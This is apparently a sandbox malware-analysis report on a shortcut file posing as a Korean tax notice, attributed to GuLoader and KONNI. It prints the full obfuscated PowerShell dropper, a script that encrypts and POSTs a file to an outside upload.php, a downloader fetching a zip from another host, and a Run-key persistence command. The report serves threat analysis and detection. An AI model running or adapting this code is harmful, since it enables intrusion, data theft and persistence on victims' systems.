File name:

오류발견 수정신고 제출 요청 안내(국세징수법 시행규칙).hwp.lnk

Full analysis: https://app.any.run/tasks/935fbb73-c785-48cc-a7cc-9918c3ab9c73
Verdict: Malicious activity
Threats:

GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities.

Malware Trends Tracker     >>>
Analysis date: January 21, 2025, 06:37:03
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
guloader
exfiltration
apt
konni
spyware
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, Unicoded, HasEnvironment, PreferEnvironmentPath, length=0, window=showminnoactive
MD5:

F162170214CED849E4E8E6FDB29A0C61

SHA1:

F99BABE6E5D219C74E8CC9703053AB02C529BF16

SHA256:

A1B67CFB080F4D1E4CBB0019A30259CB291F56C0ADA02E2CA1028F675B187727

SSDEEP:

3072:/mJaq11111111L11111C1ilB11O11V1W111811u111n1v111c1111NUTcu2cdTm4:cPccmQL0EsUfRlxEWHOg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Detected an obfuscated command line used with Guloader

      • powershell.exe (PID: 6324)

    • Changes the autorun value in the registry

      • reg.exe (PID: 2972)

    • KONNI has been detected (SURICATA)

      • powershell.exe (PID: 648)
      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6356)

    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 6320)

  • SUSPICIOUS

    • Application launched itself

      • cmd.exe (PID: 6252)
      • cmd.exe (PID: 6180)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 6180)
      • cmd.exe (PID: 6252)

    • Unpacks CAB file

      • expand.exe (PID: 1944)
      • expand.exe (PID: 236)

    • Manipulates environment variables

      • powershell.exe (PID: 6324)

    • Executable content was dropped or overwritten

      • expand.exe (PID: 1944)

    • Likely accesses (executes) a file from the Public directory

      • expand.exe (PID: 1944)
      • wscript.exe (PID: 6300)
      • cmd.exe (PID: 6440)
      • reg.exe (PID: 2972)
      • powershell.exe (PID: 5464)
      • unzip.exe (PID: 5080)
      • powershell.exe (PID: 648)
      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6356)
      • powershell.exe (PID: 6320)
      • expand.exe (PID: 236)

    • The process executes VB scripts

      • powershell.exe (PID: 6324)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 6440)

    • Downloads file from URI via Powershell

      • powershell.exe (PID: 5464)
      • powershell.exe (PID: 6320)

    • Gets full path of the running script (SCRIPT)

      • wscript.exe (PID: 6300)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6440)
      • cmd.exe (PID: 6180)

    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 6440)
      • cmd.exe (PID: 6180)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 5464)
      • powershell.exe (PID: 648)
      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 6356)
      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6320)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6300)

    • Unpacks password protected archive

      • cmd.exe (PID: 6440)

    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 6440)

    • Removes files via Powershell

      • powershell.exe (PID: 648)
      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6356)
      • powershell.exe (PID: 6324)

    • Uses SYSTEMINFO.EXE to read the environment

      • cmd.exe (PID: 6440)

    • The process connected to a server suspected of theft

      • powershell.exe (PID: 648)
      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6356)

    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 6252)

  • INFO

    • The process uses the downloaded file

      • powershell.exe (PID: 6324)

    • Reads the machine GUID from the registry

      • expand.exe (PID: 1944)

    • Checks supported languages

      • expand.exe (PID: 1944)
      • unzip.exe (PID: 5080)
      • expand.exe (PID: 236)

    • Checks transactions between databases Windows and Oracle

      • wscript.exe (PID: 6300)

    • Manual execution by a user

      • cmd.exe (PID: 6440)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 5464)
      • powershell.exe (PID: 648)
      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 6356)
      • powershell.exe (PID: 6320)
      • powershell.exe (PID: 6324)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 5464)
      • powershell.exe (PID: 6320)

    • Disables trace logs

      • powershell.exe (PID: 5464)
      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6320)

    • Checks proxy server information

      • powershell.exe (PID: 5464)
      • powershell.exe (PID: 648)
      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6320)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 648)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6356)
      • powershell.exe (PID: 6324)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 6356)
      • powershell.exe (PID: 6940)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: Description, CommandArgs, IconFile, Unicode, ExpString, PreferEnvPath
FileAttributes: (none)
TargetFileSize: -
IconIndex: (none)
RunWindow: Show Minimized No Activate
HotKey: (none)
Description: hwp File
CommandLineArguments: /c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\WindowsPowershell\*.exe ^| findstr /i rshell.exe') do (if exist "%f" (%f "function harmless{param($island); <#resolution pervert#>$honest = $island.substring(0,$island.length-4) + ''; <#conduct distress#>return $honest;};function crime{param($clay);<#consult invest#> remove-item <#composing legislative#> -path $clay <#indulgence insoluble#> -force;};function ellipse{param($igneous,$reducing,$often,$brown,$ship);<#demand cleave#> $roundish=New-Object System.IO.FileStream(<#standard board#>$igneous,<#inscription winding#>[System.IO.FileMode]::Open,<#narrowly social#>[System.IO.FileAccess]::Read);<#qualified turning#> $roundish.Seek(<#almost corner#>$reducing,[System.IO.SeekOrigin]::Begin);<#training steam#> $inheritance=$often*0x01;<#restraint tumult#> $feed=New-Object byte[] <#angles cautious#>$often; <#sculpture offspring#> $leader=New-Object byte[] <#domestic controversy#>$inheritance; <#milk fellow#>$roundish.Read(<#perpetual array#>$leader,0,<#shape graduated#>$inheritance); $roundish.Close();$people=0;while($people -lt $often){<#roof alarm#>$feed[$people]=$leader[$people*0x01] -bxor $brown;$people++;}<#rule conquer#> set-content $ship <#edible fate#> $feed -Encoding <#going pricking#> Byte;};function sensitive{param($sour, $diamond);<#bail milk#> expand $sour <#moment flatter#> -F:* $diamond;};function sprinkle{$obstruction = $env:public<#devotion sometimes#> + '\' +<#playing inclosure#> 'doc'+'ume'+'nt'+'s';<#eastern strike#> return $obstruction;};function wife{param($forming); <#fruitful formula#>$slide = Split-Path $forming;<#dexterity customary#> return $slide;};function stately{return Get-Location;};function conquest{<#strength prove#>return $env:Temp;};function prejudice{$chalk = stately; $chart = line -vigorous $chalk; <#restrict duty#>if($chart.length -eq 0) {$chalk = conquest; <#estimation octave#>$chart = line -vigorous $chalk;} return $chart;};function product{$extraction = $env:public<#fourth northern#> + '\' + 'eg'+'ypt'+'ia'+'n.c'+'ab';<#strength ending#> return $extraction;};function carrying{$rhyme = $env:public<#likeness precipitate#>+'\do'+'cume'+'nt'+'s\s'+'tart'+'.vb'+'s';<#token electric#> return $rhyme;};function line{param($vigorous); $raised = @(); $happiness = [System.IO.Directory]::GetDirectories($vigorous); $surpass = [System.IO.Directory]::GetFiles($vigorous); foreach ($file in $surpass) { $fright = New-Object System.IO.FileInfo $file; if ($fright.Extension -ieq '.ln'+'k' -and $fright.Length -eq 0x000FB845) { $raised += $fright.FullName; } }; foreach ($subDir in $happiness) { $raised += line -dir $subDir; } return $raised[0];};$pottery = prejudice;<#grateful cushion#>$refractory = wife -forming $pottery;<#preacher labor#> $convey = harmless -island $pottery;ellipse -igneous <#but weak#> $pottery -reducing <#nasal discern#> 0x00002192 -often 0x00006C00 -brown <#insoluble division#> 0x2B -ship <#golden collection#> $convey;<#accept limit#> & $convey;$manuscript=product;<#determine wicked#>ellipse -igneous <#prolific warm#> $pottery -reducing <#pour attended#> 0x00008D92 -often <#subjected provoke#> 0x00013CE1 -brown <#eagle political#> 0x72 -ship <#receptacle countries#> $manuscript;<#panel male#>crime -clay $pottery;$naturally = sprinkle;<#cluster desire#>sensitive -sour $manuscript -diamond <#wreck confirm#>$naturally;<#plastic fellow#>crime -clay $manuscript;$internal = <#reducing precedent#>carrying;<#prominent interval#>& $internal;") )
IconFileName: .hwp
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
152
Monitored processes
25
Malicious processes
9
Suspicious processes
2

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs findstr.exe no specs #GULOADER powershell.exe no specs openwith.exe no specs expand.exe wscript.exe no specs cmd.exe no specs conhost.exe no specs reg.exe powershell.exe unzip.exe no specs systeminfo.exe no specs tiworker.exe no specs timeout.exe no specs #KONNI powershell.exe #KONNI powershell.exe #KONNI powershell.exe #KONNI powershell.exe powershell.exe expand.exe no specs timeout.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
236expand rBZlI.cab -F:* C:\Users\Public\Documents\ C:\Windows\System32\expand.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
LZ Expansion Utility
Exit code:
0
Version:
5.00 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\expand.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
648powershell -command "function MveQVbIDJW{param ($mJXxJazxawo,$LSYuJYQDZGLI);$CenAoEJDnreL = [System.Text.Encoding]::UTF8.GetBytes($mJXxJazxawo); $vuHEtbxgvE = [System.Text.Encoding]::UTF8.GetBytes($LSYuJYQDZGLI);$laRcinPokW = New-Object byte[](256);$DfEWndQDqBZg = New-Object byte[](256);for ($RxCRKNEbwbqo = 0; $RxCRKNEbwbqo -lt 256; $RxCRKNEbwbqo++) {$laRcinPokW[$RxCRKNEbwbqo] = $RxCRKNEbwbqo;$DfEWndQDqBZg[$RxCRKNEbwbqo] = $vuHEtbxgvE[$RxCRKNEbwbqo % $vuHEtbxgvE.Length];}$ITGAYvCLSBe = 0;for ($RxCRKNEbwbqo = 0; $RxCRKNEbwbqo -lt 256; $RxCRKNEbwbqo++) {$ITGAYvCLSBe = ($ITGAYvCLSBe + $laRcinPokW[$RxCRKNEbwbqo] + $DfEWndQDqBZg[$RxCRKNEbwbqo]) % 256;$VvxyHPQYzikd = $laRcinPokW[$RxCRKNEbwbqo];$laRcinPokW[$RxCRKNEbwbqo] = $laRcinPokW[$ITGAYvCLSBe];$laRcinPokW[$ITGAYvCLSBe] = $VvxyHPQYzikd;}$ktPhPZJyPx = New-Object byte[] $CenAoEJDnreL.Length;$RxCRKNEbwbqo = 0;$ITGAYvCLSBe = 0;for ($sxXCUmVjSfN = 0; $sxXCUmVjSfN -lt $CenAoEJDnreL.Length; $sxXCUmVjSfN++) {$RxCRKNEbwbqo = ($RxCRKNEbwbqo + 1) % 256;$ITGAYvCLSBe = ($ITGAYvCLSBe + $laRcinPokW[$RxCRKNEbwbqo]) % 256;$VvxyHPQYzikd = $laRcinPokW[$RxCRKNEbwbqo];$laRcinPokW[$RxCRKNEbwbqo] = $laRcinPokW[$ITGAYvCLSBe];$laRcinPokW[$ITGAYvCLSBe] = $VvxyHPQYzikd;$jfuHvlVICC = ($laRcinPokW[$RxCRKNEbwbqo] + $laRcinPokW[$ITGAYvCLSBe]) % 256;$ktPhPZJyPx[$sxXCUmVjSfN] = $CenAoEJDnreL[$sxXCUmVjSfN] -bxor $laRcinPokW[$jfuHvlVICC];}$QngmMtEmUeKu = [System.Convert]::ToBase64String($ktPhPZJyPx);return $QngmMtEmUeKu;};$hPcNWDxSjIIJ=(Get-Date).Ticks.ToString();$hBHdjYuVZDuC='http://www.fantasiasognorealta.com/wp-includes/js/src/upload.php';$FzWkQjsuSZD='DESKTOP-JGLLJLD_down.txt';$CtdlRLSbriP='C:\Users\Public\Documents\d1.txt';$xKjSymXJJJ=gc -Path $CtdlRLSbriP -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$FzWkQjsuSZD=MveQVbIDJW -mJXxJazxawo $FzWkQjsuSZD -LSYuJYQDZGLI $hPcNWDxSjIIJ;$xKjSymXJJJ=MveQVbIDJW -mJXxJazxawo $xKjSymXJJJ -LSYuJYQDZGLI $hPcNWDxSjIIJ;$cdvzREusfY = [System.Web.HttpUtility]::ParseQueryString('');$cdvzREusfY['fn']=$FzWkQjsuSZD;$cdvzREusfY['fd']=$xKjSymXJJJ;$cdvzREusfY['r']=$hPcNWDxSjIIJ;$MrTvsvMKJRW=$cdvzREusfY.ToString();$BHRwVBjqBO=[System.Text.Encoding]::UTF8.GetBytes($MrTvsvMKJRW);$IxupVhaWcMC=[System.Net.WebRequest]::Create($hBHdjYuVZDuC);$IxupVhaWcMC.Method='PO'+'ST';$IxupVhaWcMC.ContentType='appl'+'ic'+'ation/x'+'-ww'+'w-for'+'m-ur'+'le'+'nco'+'ded';$IxupVhaWcMC.ContentLength=$BHRwVBjqBO.Length;$vkRnWVbmxrvs = $IxupVhaWcMC.GetRequestStream();$vkRnWVbmxrvs.Write($BHRwVBjqBO,0,$BHRwVBjqBO.Length);$vkRnWVbmxrvs.Close();$UNGzfRydOy=$IxupVhaWcMC.GetResponse();if($UNGzfRydOy.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $CtdlRLSbriP;$EaOwWEqLXycJ='C:\Users\Public\Documents\up'+'o'+'k.t'+'xt';New-Item -ItemType File -Path $EaOwWEqLXycJ;}" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1944"C:\WINDOWS\system32\expand.exe" C:\Users\Public\egyptian.cab -F:* C:\Users\Public\documentsC:\Windows\System32\expand.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
LZ Expansion Utility
Exit code:
0
Version:
5.00 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\expand.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2972reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v startsvc1 /t REG_SZ /d "C:\Users\Public\Documents\start.vbs" /f C:\Windows\System32\reg.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ws2_32.dll
5080unzip.exe -o -P "a0" "C:\Users\Public\Documents\di3726.zip" C:\Users\Public\Documents\unzip.execmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
9
Modules
Images
c:\users\public\documents\unzip.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\advapi32.dll
5112timeout -t 57 /nobreakC:\Windows\System32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
5464powershell -command "function MLGBRrjjOTu{param ($jqCTIhZAxl,$kfNUsRSHCDz);$JBIEmUsgSR = [System.Text.Encoding]::UTF8.GetBytes($jqCTIhZAxl); $ECAXqTKcgSu = [System.Text.Encoding]::UTF8.GetBytes($kfNUsRSHCDz);$VnsNRPPnlwed = New-Object byte[](256);$kxQuNhgwoH = New-Object byte[](256);for ($nXgNVlbzwrTx = 0; $nXgNVlbzwrTx -lt 256; $nXgNVlbzwrTx++) {$VnsNRPPnlwed[$nXgNVlbzwrTx] = $nXgNVlbzwrTx;$kxQuNhgwoH[$nXgNVlbzwrTx] = $ECAXqTKcgSu[$nXgNVlbzwrTx % $ECAXqTKcgSu.Length];}$UYdROjElaQ = 0;for ($nXgNVlbzwrTx = 0; $nXgNVlbzwrTx -lt 256; $nXgNVlbzwrTx++) {$UYdROjElaQ = ($UYdROjElaQ + $VnsNRPPnlwed[$nXgNVlbzwrTx] + $kxQuNhgwoH[$nXgNVlbzwrTx]) % 256;$FyjXnQqYoK = $VnsNRPPnlwed[$nXgNVlbzwrTx];$VnsNRPPnlwed[$nXgNVlbzwrTx] = $VnsNRPPnlwed[$UYdROjElaQ];$VnsNRPPnlwed[$UYdROjElaQ] = $FyjXnQqYoK;}$MHAheRKHRFeM = New-Object byte[] $JBIEmUsgSR.Length;$nXgNVlbzwrTx = 0;$UYdROjElaQ = 0;for ($NwUmxAYFGscW = 0; $NwUmxAYFGscW -lt $JBIEmUsgSR.Length; $NwUmxAYFGscW++) {$nXgNVlbzwrTx = ($nXgNVlbzwrTx + 1) % 256;$UYdROjElaQ = ($UYdROjElaQ + $VnsNRPPnlwed[$nXgNVlbzwrTx]) % 256;$FyjXnQqYoK = $VnsNRPPnlwed[$nXgNVlbzwrTx];$VnsNRPPnlwed[$nXgNVlbzwrTx] = $VnsNRPPnlwed[$UYdROjElaQ];$VnsNRPPnlwed[$UYdROjElaQ] = $FyjXnQqYoK;$zBXVlJeTklt = ($VnsNRPPnlwed[$nXgNVlbzwrTx] + $VnsNRPPnlwed[$UYdROjElaQ]) % 256;$MHAheRKHRFeM[$NwUmxAYFGscW] = $JBIEmUsgSR[$NwUmxAYFGscW] -bxor $VnsNRPPnlwed[$zBXVlJeTklt];}$KzigMrYemXG = [System.Convert]::ToBase64String($MHAheRKHRFeM);return $KzigMrYemXG;};$QlHKpkaDhTHf = 'https://raleighice.com/wp-includes/js/inc/get.php?ra=iew&zw=lk0100';$liLROUyJNri = 'C:\Users\Public\Documents\di3726.zip';Add-Type -AssemblyName 'System.Web';$aVmsVMkBoEvn=(Get-Date).Ticks.ToString();$WwSdMQbZUdfJ = $QlHKpkaDhTHf.Split('?')[1];$qNNYHElwOS = MLGBRrjjOTu -jqCTIhZAxl $WwSdMQbZUdfJ -kfNUsRSHCDz $aVmsVMkBoEvn;$QlHKpkaDhTHf=$QlHKpkaDhTHf.Split('?')[0]+'?'+$aVmsVMkBoEvn+'='+[System.Web.HttpUtility]::UrlEncode($qNNYHElwOS);iwr -Uri $QlHKpkaDhTHf -OutFile $liLROUyJNri;" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5548systeminfo C:\Windows\System32\systeminfo.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Displays system information
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\systeminfo.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
6180"C:\WINDOWS\system32\cmd.exe" /c for /f "tokens=*" %f in ('dir /s /b C:\WINDOWS\System32\WindowsPowershell\*.exe ^| findstr /i rshell.exe') do (if exist "%f" (%f "function harmless{param($island); <#resolution pervert#>$honest = $island.substring(0,$island.length-4) + ''; <#conduct distress#>return $honest;};function crime{param($clay);<#consult invest#> remove-item <#composing legislative#> -path $clay <#indulgence insoluble#> -force;};function ellipse{param($igneous,$reducing,$often,$brown,$ship);<#demand cleave#> $roundish=New-Object System.IO.FileStream(<#standard board#>$igneous,<#inscription winding#>[System.IO.FileMode]::Open,<#narrowly social#>[System.IO.FileAccess]::Read);<#qualified turning#> $roundish.Seek(<#almost corner#>$reducing,[System.IO.SeekOrigin]::Begin);<#training steam#> $inheritance=$often*0x01;<#restraint tumult#> $feed=New-Object byte[] <#angles cautious#>$often; <#sculpture offspring#> $leader=New-Object byte[] <#domestic controversy#>$inheritance; <#milk fellow#>$roundish.Read(<#perpetual array#>$leader,0,<#shape graduated#>$inheritance); $roundish.Close();$people=0;while($people -lt $often){<#roof alarm#>$feed[$people]=$leader[$people*0x01] -bxor $brown;$people++;}<#rule conquer#> set-content $ship <#edible fate#> $feed -Encoding <#going pricking#> Byte;};function sensitive{param($sour, $diamond);<#bail milk#> expand $sour <#moment flatter#> -F:* $diamond;};function sprinkle{$obstruction = $env:public<#devotion sometimes#> + '\' +<#playing inclosure#> 'doc'+'ume'+'nt'+'s';<#eastern strike#> return $obstruction;};function wife{param($forming); <#fruitful formula#>$slide = Split-Path $forming;<#dexterity customary#> return $slide;};function stately{return Get-Location;};function conquest{<#strength prove#>return $env:Temp;};function prejudice{$chalk = stately; $chart = line -vigorous $chalk; <#restrict duty#>if($chart.length -eq 0) {$chalk = conquest; <#estimation octave#>$chart = line -vigorous $chalk;} return $chart;};function product{$extraction = $env:public<#fourth northern#> + '\' + 'eg'+'ypt'+'ia'+'n.c'+'ab';<#strength ending#> return $extraction;};function carrying{$rhyme = $env:public<#likeness precipitate#>+'\do'+'cume'+'nt'+'s\s'+'tart'+'.vb'+'s';<#token electric#> return $rhyme;};function line{param($vigorous); $raised = @(); $happiness = [System.IO.Directory]::GetDirectories($vigorous); $surpass = [System.IO.Directory]::GetFiles($vigorous); foreach ($file in $surpass) { $fright = New-Object System.IO.FileInfo $file; if ($fright.Extension -ieq '.ln'+'k' -and $fright.Length -eq 0x000FB845) { $raised += $fright.FullName; } }; foreach ($subDir in $happiness) { $raised += line -dir $subDir; } return $raised[0];};$pottery = prejudice;<#grateful cushion#>$refractory = wife -forming $pottery;<#preacher labor#> $convey = harmless -island $pottery;ellipse -igneous <#but weak#> $pottery -reducing <#nasal discern#> 0x00002192 -often 0x00006C00 -brown <#insoluble division#> 0x2B -ship <#golden collection#> $convey;<#accept limit#> & $convey;$manuscript=product;<#determine wicked#>ellipse -igneous <#prolific warm#> $pottery -reducing <#pour attended#> 0x00008D92 -often <#subjected provoke#> 0x00013CE1 -brown <#eagle political#> 0x72 -ship <#receptacle countries#> $manuscript;<#panel male#>crime -clay $pottery;$naturally = sprinkle;<#cluster desire#>sensitive -sour $manuscript -diamond <#wreck confirm#>$naturally;<#plastic fellow#>crime -clay $manuscript;$internal = <#reducing precedent#>carrying;<#prominent interval#>& $internal;") )C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
Total events
41 764
Read events
41 761
Write events
3
Delete events
0

Modification events

(PID) Process:(2972) reg.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:startsvc1
Value:
C:\Users\Public\Documents\start.vbs
(PID) Process:(6532) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdHigh
Value:
31157198
(PID) Process:(6532) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdLow
Value:
Executable files
2
Suspicious files
3
Text files
34
Unknown types
0

Dropped files

PID
Process
Filename
Type
6324powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lpxingy3.wgt.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1944expand.exeC:\Users\Public\Documents\59149229.battext
MD5:E31618289C25D2273F439F0ADDA2EF64
SHA256:DC97AFB0D2AE4876FD81C8BD679950B6F14FDFA34C8F7E3919B27ED845E6E1DC
1944expand.exeC:\Users\Public\Documents\03828398.battext
MD5:179978B545DAAF7FA27D422015F24C87
SHA256:DB4A02E984E1C12105CB6C2C196669A5D93E3E24D54A917D168A9A7F73898EE4
1944expand.exeC:\Users\Public\Documents\98755194.battext
MD5:F2CD33F7CE1F794881AA53AC19E6049D
SHA256:083E10819A8884D4085A9A53B2B8C88CE3CE8BB4DC9F4C2E1CC3F423C08B01B2
1944expand.exeC:\Users\Public\Documents\unzip.exeexecutable
MD5:75375C22C72F1BEB76BEA39C22A1ED68
SHA256:8D9B5190AACE52A1DB1AC73A65EE9999C329157C8E88F61A772433323D6B7A4A
1944expand.exeC:\Users\Public\Documents\start.vbstext
MD5:11CDEFEFA9DE934730F266E6A08E7E16
SHA256:BE5A657DAB3DF9C50B6AA15FD214E9BA9879DF7899E7F844BBBC6767E614E6AB
6324powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3a5j1m2d.3bw.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6324powershell.exeC:\Users\admin\AppData\Local\Temp\오류발견 수정신고 제출 요청 안내(국세징수법 시행규칙).hwpbinary
MD5:F0854CC47914B9C62F467A7CEF7CE8B3
SHA256:6AB0B9F9743A59268EBA1B033ACEB245A829260A250F5E6A8DE066DEC6E14026
6324powershell.exeC:\Users\Public\egyptian.cabcompressed
MD5:957ADDA6FD9BDB8DB2EF6A14F224F769
SHA256:EB43B1D364DD08B6A16406FFD458C18F267541864AEA8FC30B0BD1FA3AEF40AE
1944expand.exeC:\Users\Public\Documents\68354122.battext
MD5:2BF12F8FB8C2B2D8B0F0832BBF132A8C
SHA256:C3FC560BDAE5F2C0CDADC2C32E71D34EC31FDD7F033B1CC128370D34255EBA93
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
29
DNS requests
15
Threats
5

HTTP requests

